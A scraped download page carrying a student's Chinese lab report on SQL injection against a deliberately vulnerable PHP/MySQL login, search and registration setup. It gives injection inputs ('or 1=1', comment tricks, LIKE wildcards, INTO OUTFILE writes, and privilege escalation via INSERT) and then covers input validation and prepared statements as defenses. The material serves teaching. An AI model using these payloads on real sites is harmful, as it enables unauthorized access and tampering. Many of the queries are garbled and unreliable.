ImageVerifierCode 换一换
格式:DOCX , 页数:24 ,大小:1.20MB ,
资源ID:17268600      下载积分:3 金币
快捷下载
登录下载
邮箱/手机:
温馨提示:
快捷下载时,用户名和密码都是您填写的邮箱或者手机号,方便查询和重复下载(系统自动生成)。 如填写123,账号就是123,密码也是123。
特别说明:
请自助下载,系统不会自动发送文件的哦; 如果您已付费,想二次下载,请登录后访问:我的下载记录
支付方式: 支付宝    微信支付   
验证码:   换一换

加入VIP,免费下载
 

温馨提示:由于个人手机设置不同,如果发现不能下载,请复制以下地址【https://www.bdocx.com/down/17268600.html】到电脑端继续下载(重复下载不扣费)。

已注册用户请登录:
账号:
密码:
验证码:   换一换
  忘记密码?
三方登录: 微信登录   QQ登录  

下载须知

1: 本站所有资源如无特殊说明,都需要本地电脑安装OFFICE2007和PDF阅读器。
2: 试题试卷类文档,如果标题没有明确说明有答案则都视为没有答案,请知晓。
3: 文件的所有权益归上传用户所有。
4. 未经权益所有人同意不得将文件中的内容挪作商业或盈利用途。
5. 本站仅提供交流平台,并不能对任何下载内容负责。
6. 下载文件中如有侵权或不适当内容,请与我们联系,我们立即纠正。
7. 本站不保证下载资源的准确性、安全性和完整性, 同时也不承担用户因使用这些下载资源对自己和他人造成任何形式的伤害或损失。

版权提示 | 免责声明

本文(信息安全实验4报告模板文档格式.docx)为本站会员(b****4)主动上传,冰豆网仅提供信息存储空间,仅对用户上传内容的表现方式做保护处理,对上载内容本身不做任何修改或编辑。 若此文所含内容侵犯了您的版权或隐私,请立即通知冰豆网(发送邮件至service@bdocx.com或直接QQ联系客服),我们立即给予删除!

信息安全实验4报告模板文档格式.docx

1、service mysqld status(2) 创建user数据库表在控制台中输入mysql,进入mysql客户端控制台(mysql)。选择工作数据库test(缺少状态下,test数据库已被创建)。use test;创建user数据库表CREATE TABLE user(userid int(11) NOT NULL AUTO_INCREMENT, username varchar(20) NOT NULL DEFAULT , password varchar(20) NOT NULL DEFAULT , PRIMARY KEY(userid)TYPE=MyISAM AUTO_INCREME

2、NT=3;插入两条数据信息INSERT INTO user VALUES(1, angel, mypass);INSERT INTO user VALUES(2, lblisyourpass查看数据库表select * from user;2.编写PHP脚本查询user数据库表编写access.php脚本,内容如下:SQL查询: $sql_select从代码中可知,当输入正确的用户名和密码后,就会提示登录成功,否则登录失败。单击桌面控制面板中“Web浏览器”按钮,当我们在URL地址栏中提交:http:/本机IP/access.php?username=angel&password=mypass

3、Web页面会提示“登录成功”。写出此时PHP脚本中具体的SQL查询语句: SELECT*FROM user WHERE username=angelAND password=mypass 3.实施SQL注入(1) 在URL地址栏中提交:username=angel or 1=1注入是否成功? 否 。 SELECT*FROM user WHERE username=angelor 1=1AND password=” (2) 在URL地址栏中提交: or 1=1 是 。 SELECT*FROM user WHERE username=angelor 1=1AND password=” 通过分析SQ

4、L查询语句解释实验现象: username=angelor 1=1是不合法的,username=angelor 1=1是合法的用户,名注入,且任何数或上1都为1,所以成功。(3) 在URL地址栏中提交:%23 SELECT*FROM user WHERE username=angel#AND password=” 此处利用了MySQL支持“#”注释格式的特性,在提交的时候会将#后面的语句注释掉。由于编码问题,在多数Web浏览器URL地址栏里直接提交#会变成空,所以这里使用了字符“#”的ASCII码值0x23。(4) Mysql还支持“/*”注释格式,请写出利用“/*”实现注入的URL,以及此时

5、的SQL查询语句。SQL查询语句:SELECT*FROM user WHERE username=angel* AND password=”URL: http:/172.16.0.179/access.php?username=angle%2F%2A (5) 步骤(2)通过向username注入逻辑or运算,在只需知晓用户名的情况下便可成功登录。下面请设计单独向password注入逻辑运算(可多个),要求在只需知晓用户名的情况下实现登录:SELECT*FROM user WHERE username=angelor 1=1 AND password=” username=angle%20or%

6、201=1 (6) 下面请设计SQL查询语句,要求在不需要知晓用户名和密码的情况下实现登录。提示:通过猜测用户ID字段名称与用户序列号,结合逻辑运算,向password进行注入。SELECT*FROM user WHERE username=angelor 1=1 AND password=”username=angle%20or%201=1 二搜索引擎注入值得注意的是,Internet上有许多的PHP程序搜索引擎是存在问题的,也就是提交特殊字符就可以显示所有记录,包括不符合条件的。1.创建隶属test数据库的file表(1) 创建file数据库表file数据库表结构如下:CREATE TAB

7、LE file( fileid int(11) NOT NULL AUTO_INCREMENT, title varchar(20) NOT NULL DEFAULT , author varchar(20) NOT NULL DEFAULT summary varchar(1024) NOT NULL DEFAULT PRIMARY KEY(fileid) TYPE=MyISAM AUTO_INCREMENT=3;(2) 插入四条数据信息titleauthorsummaryhoneypot paperhoneypot and honeynetsnort papersnort intrusio

8、n detectionsnort based networkppianother snort paperiptables+snortno nameintelligence ids2.编写HTML页面通过HTML页面提交表单给服务器端PHP脚本,由PHP根据表单索引关键字对MySQL数据库进行查询,最后将查询结果返回给HTML页面。HTML页面代码如下:htmlbodyform action=search.php method=post # 指定处理表单请求的PHP脚本为search.phptable border=0tr bgcolor=#cccaaa td width=300文档搜索引擎/t

9、r/tabletrtd关键字:td align=leftinput type=text name=key size=32 maxlength=td bgcolor= colspan=2 align=submit value=搜索/form/body/htmlHTML页面如图所示:3.编写PHP脚本查询file数据库表 $key = $_POSTkey # 从html表单中提取变量值headtitle搜索结果/headh3/h3php echo 搜索关键字:$key文档搜索时间: echo date(H:i, jS F搜索结果:$tablename = $result = mysql_conne

10、ct($servername,$dbusername,$dbpassword);$result ) echo (连接mysql服务器失败empty($key) ) $sql_select = SELECT * FROM file WHERE title LIKE %$key% # 模糊查询title中含有指定关键字的记录,其中%符号表示通配,这里前、后均通配 $result = mysql_db_query($dbname, $sql_select); if( empty($result) ) echo error $total = mysql_num_rows($result); if($t

11、otal = 0)The $key was not found in all the record.htmlspecialchars($filetitle).摘要:.htmlspecialchars($filesummary);else echo ( b请输入查询关键字.exit();输入关键字“snort”,进行搜索,搜索结果中含有多少条记录? 3 。记录中是否包含与snort关键字无关的项 无 。 SELECT * FORM file WHERE title LIKE %$snort%”;4.SQL注入(1) 利用PHP脚本没有对关键字变量进行检查的漏洞进入SQL注入。输入关键字“%”,进

12、行搜索,搜索结果中含有多少条记录? 4 。记录中是否包含与snort关键字无关的项 2个分别为:honeypot pater和 iptables + snort 。 SELECT * FORM file WHERE title LIKE %$%”;解释SQL查询语句含义: 搜索表,并对file表搜索关键字“%”的数据 (2) 输入关键字“_ORDER BY fileid#”说明“_”字符表示单字符通配,n个“_”字符则表示n字符通配。“ORDER BY fileid”表示按特定顺序进行SQL查询。若fileid为整型字段,则按整数大小(由小到大)顺序进行查询;若fileid为字符数组类型字段,

13、则按字符ASCII码(由前到后)顺序进行查询。 SELECT * FORM file WHERE title LIKE %$_ORDER BY fileid#%”; 搜索表,并对file表搜索关键字“_ORDER BY fileid#”的数据 三注入实现导出文件本实验步骤仅为说明由于SQL注入而给服务器系统带来一定程度上的危害。在步骤一中,我们使用用户名,在无需知晓用户密码的情况下,通过SQL注入实现了登录。作为进一步操作,我们可以通过SQL注入来向服务器硬盘中写入大量无用的文件,而这是利用了MySQL的“INTO OUTFILE”命令,其查询方法如下:SELECT * FROM user W

14、HERE cond INTO OUTFILE /etc/temp.txt上述SQL查询语句会将user数据库表中,满足cond条件的记录以INTO OUTFILE标准格式导出到/etc/temp.txt文件中。而信息能够被成功导出到/etc/temp.txt中的条件是目标目录有可写的权限和目标文件不存在。基于步骤一,写出能够实现(SQL注入)上述功能的URL:/172.16.0.56/access.php?passname=mypassINTO OUTFILE/etc/temp.txt SELECT * FROM user WHERE username=angelAND passname=my

15、passhttp:passname=mypassINTO OUTFILE/etc/temp.txt 四通过注入提升用户权限如果大家认为SQL注入仅仅适用于SELECT语句就大错特错了,其实还有两个危害更大的操作,那就是INSERT和UPDATE语句。(1) 创建隶属test数据库的register表切换至/opt/ExpNIC/HostSec-Lab/Projects/step4/目录,执行脚本create_table_register创建register数据库表。写出数据表包含的字段名称: Userid 、username 、password 、homepage 、userlevel (2)

16、 注册用户将/opt/ExpNIC/HostSec-Lab/Projects/step4/目录中的register.htm和register. php文件拷贝至/var/www/html目录下。在Web浏览器URL地址栏中访问register.htm页面。填写“用户名”、“用户口令”和“个人主页”信息,单击“注册”按钮,进行注册。注册用户级别(userlevel) 3 。/截图,注册成功的图,图里面需要包含地址栏(3) SQL注入提升注册用户权限返回到register.htm页面,按如下方法填写“个人主页”信息。, 1)#单击“注册”按钮,用户注册级别 1 。 INSEERT INTO reg

17、isterVALUES(0,zoutuoling,123456,1)#,3) 【思考问题】1 SQL注入漏洞产生的原因是什么?练习二、 防范SQL注入了解防范SQL注入的方法学会利用合法性校验防范SQL注入学会利用prepared statement执行SQL查询【实验工具】-一客户端进行合法性校验 进行实验之前首先启动MySQL服务,命令如下:(1) 单击工具栏“控制台”按钮,进入实验目录。login是存在SQL注入漏洞的Web应用程序。复制login.htm和login.php文件到/var/www/html/目录(Web服务文档主目录)。(2) 使用Web浏览器浏览login.htm,在

18、URL地址栏中输入如下信息:/本机IP地址/login.htm进入“注册会员登录”页面,用户名:hello,密码:hellopass,确定登录成功。(3) 注入攻击返回login.htm登录界面,输入用户名:hello1=1,密码任意,尝试登录。由于login.htm没有对“用户名”、“密码”输入数据的合法性进行验证,从而导致了SQL被注入。(4) 编辑/var/www/html/login.htm文件,利用JavaScript对用户输入数据进行合法性验证,限制用户输入“”(单引号)、“”(双引号)、“-”、“=”、“;”、“”、“”、“/”、“%”特殊字符及SQL关键字。(5) 加入合法性校

19、验后,尝试基于login.htm进行SQL注入攻击。(6) 加入合法性校验后,尝试基于URL进行SQL注入攻击。直接在URL链接中输入http:/虚拟主机地址/login.php?username=helloor1=1。二服务器进行合法性校验(1) 复制并重命名实验目录login.htm和login.php文件至/var/www/html/login2. htm和login2.php。(2) 编辑/var/www/html/login2.php文件,利用PHP脚本对用户输入数据进行合法性验证,限制用户输入“”(单引号)、“(3) 加入合法性校验后,尝试基于login.htm进行SQL注入攻击。

20、 (4) 加入合法性校验后,尝试基于URL进行SQL注入攻击。三预处理执行SQL查询(1) 复制并重命名实验目录login.htm和login.php文件至/var/www/html/login3. htm和login3.php。(2) 编辑/var/www/html/login3.php文件,重写PHP访问MySQL数据库部分,利用prepared statement实现SQL查询。(3) 尝试进行各种SQL注入攻击。实验心得关于本实验我最大的感触是,在操作上有很大的困难,老师讲解后能够知道如何操作,但是整个实验,时间往往是浪费在操作过程上。另外,这个实验虚拟机用的是linux系统,因此与windows系统不能直接移动文件,要通过虚拟机里的windows系统才能把文件移进去,这也运用了计算机的IP地址,IP地址在整个实验过程起到至关重要的作用,一旦IP地址出错就无法访问本机,也就导致无法执行相应操作。实验评价点评:1、实验操作2、报告内容3、课后思考题4、课堂表现总评

copyright@ 2008-2022 冰豆网网站版权所有

经营许可证编号:鄂ICP备2022015515号-1